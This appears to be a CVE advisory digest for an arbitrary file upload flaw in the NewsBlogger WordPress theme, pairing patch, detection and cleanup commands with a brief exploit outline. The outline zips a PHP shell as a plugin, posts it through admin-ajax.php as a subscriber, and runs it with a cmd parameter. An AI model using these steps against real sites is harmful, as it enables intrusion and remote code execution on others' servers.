How CVE-2025-1304 Works
The NewsBlogger WordPress theme (≤v0.2.5.1) lacks a capability check in the `newsblogger_install_and_activate_plugin()` function, allowing authenticated attackers (even subscribers) to upload arbitrary files. This flaw stems from improper validation during plugin installation via AJAX, enabling malicious actors to upload PHP shells or other executable files. Remote code execution (RCE) is achievable if the uploaded file is placed in a web-accessible directory. The vulnerability leverages WordPress’s `wp_ajax_` hook system, bypassing intended restrictions due to missing `current_user_can()` checks.
DailyCVE Form
Platform: WordPress
Version: ≤0.2.5.1
Vulnerability: Arbitrary File Upload
Severity: Critical
Date: 2025-05-01
What Undercode Say:
Exploit:
- Craft a malicious plugin ZIP containing a PHP shell (e.g.,
shell.php):zip -r evil_plugin.zip shell.php
2. Send AJAX request as a subscriber:
POST /wp-admin/admin-ajax.php HTTP/1.1 Action=newsblogger_install_and_activate_plugin&plugin=evil_plugin.zip
3. Trigger execution by accessing the uploaded file:
GET /wp-content/plugins/evil_plugin/shell.php?cmd=id
Protection:
1. Patch: Update NewsBlogger theme beyond v0.2.5.1.
- Restrict uploads: Add `.htaccess` to block PHP execution in uploads:
<Files .php> Deny from all </Files>
- Capability check: Modify theme code to verify
current_user_can('install_plugins').
Detection:
Scan for suspicious files:
find /var/www/html -name ".php" -mtime -1
Mitigation Commands:
1. Remove vulnerable theme:
wp theme delete newsblogger
2. Audit users:
wp user list --role=subscriber
Code Fix (Patch Snippet):
function newsblogger_install_and_activate_plugin() {
if (!current_user_can('install_plugins')) {
wp_die(__('Unauthorized access.'));
}
// Rest of function logic
}
Log Analysis:
Check Apache logs for suspicious uploads:
grep "admin-ajax.php" /var/log/apache2/access.log | grep "newsblogger_install"
References:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
